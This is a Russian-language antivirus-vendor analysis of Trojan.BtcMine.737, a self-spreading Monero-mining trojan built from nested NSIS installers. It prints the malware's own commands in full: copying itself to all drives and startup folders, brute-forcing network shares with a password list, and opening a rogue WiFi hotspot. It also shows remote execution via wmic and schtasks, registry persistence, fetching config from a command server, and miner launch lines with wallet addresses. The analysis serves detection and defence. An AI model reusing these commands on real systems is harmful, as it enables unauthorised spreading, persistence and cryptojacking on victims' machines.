SHA1:
cc1e71c0e65280c9a32699e2850fafba19218fa0 (дроппер)
edd53c0995a37618ffdb84557c8d737ae1ff5cc6 (червь)
f6ab05d457dab97767e5112ac4cc6e4998345afa (майнер)
Троянец, предназначенный для добычи (майнинга) криптовалют и состоящий из трех упакованных друг в друга установщиков, созданных злоумышленниками с использованием технологии Nullsoft Scriptable Install System (NSIS).
Первый слой представляет собой довольно-таки простой дроппер: он пытается остановить ранее запущенные процессы троянца:
cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe
Затем размещает и запускает собственные копии на диске атакуемого компьютера:
%TEMP%\Key.exe
после чего пытается удалить исходный файл:
cmd /c for %i in (1,1,900) do del "<полный путь к дропперу>"
Второй установщик, представленный в виде файла key.exe, сохраняет и запускает исполняемый файл с именем CNminer.exe в папке:
%APPDATA%\NsCpuCNMiner\ Создает свою копию в папке %APPDATA%\%USERNAME% с помощью команды:
cmd /c xcopy /y <своё имя> %COMMON_STARTUP% & xcopy /y /i <cвоё имя> %APPDATA%\%USERNAME%
затем автоматически открывает к ней доступ из локальной сети:
net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs
Сохраняет свою копию в папке «Документы» пользователя Windows:
"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"
Затем троянец копирует себя в корневую папку всех дисков инфицированной машины (эту операцию он повторяет с определенной периодичностью):
cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\
В целевых папках эти копии вредоносной программы отображаются в виде файла с именем Key, имеющего значок WinRAR-архива.
После запуска троянец перечисляет доступные в сетевом окружении компьютеры:
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view
и пытается подключиться к ним, перебирая логины и пароли с использованием имеющегося в его распоряжении специального списка:
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
...Помимо этого, вредоносная программа пытается подобрать пароль к локальной учетной записи пользователя Windows. Если это удается, Trojan.BtcMine.737 при наличии соответствующего оборудования запускает на инфицированном компьютере открытую точку доступа WiFi:
cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 &&
SchTasks /Run /TN WiFi /i
Если вредоносной программе удалось получить доступ к одному из компьютеров в локальной сети, предпринимается попытка сохранить и запустить на нем копию троянца либо с использованием инструментария Windows Management Instrumentation (WMI):
StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")
либо при помощи планировщика заданий:
Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f
Запустившись на инфицированном компьютере, приложение CNminer.exe сохраняет в текущей папке исполняемые файлы майнера: NsCpuCNMiner32.exe, NsCpuCNMiner64.exe и pools.txt. Ссылку на исполняемый файл троянец вносит в отвечающую за автоматический запуск приложений ветвь системного реестра Windows, и, кроме того, сохраняет ярлык на него в стандартной папке автозапуска:
WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer"
"$APPDATA\NsCpuCNMiner\CNminer.exe"
CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336
После старта установщика содержащийся в нем сценарий останавливает уже работающие процессы майнеров (если они были запущены ранее):
cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe
Затем троянец обращается к своему управляющему серверу, который возвращает ему в виде HTML-файла дополнительные конфигурационные данные с параметрами пулов и номерами электронных кошельков, причем эти номера периодически меняются:
StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33]
"st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru"
StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0"
StrCpy $[35]
"43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgA
Bp"
...
Push kernel32::GetTickCount()i.r2
StrCpy $[32] "http://$[32]/test.html?$2"
...
Push $[32]
Push /TOSTACK
Push Mozilla/5.0 Gecko/20100101 Firefox/4.0
Push /USERAGENT
RegisterDLL $PLUGINSDIR\inetc.dll get 0
Sleep 942
Затем запускается сам майнер:
"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1
-o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899
K -p x
Следует отметить, что в качестве майнера для добычи криптовалюты злоумышленники используют утилиту другого разработчика, детектируемую Антивирусом Dr.Web как программу из семейства Tool.BtcMine.
Новость о троянце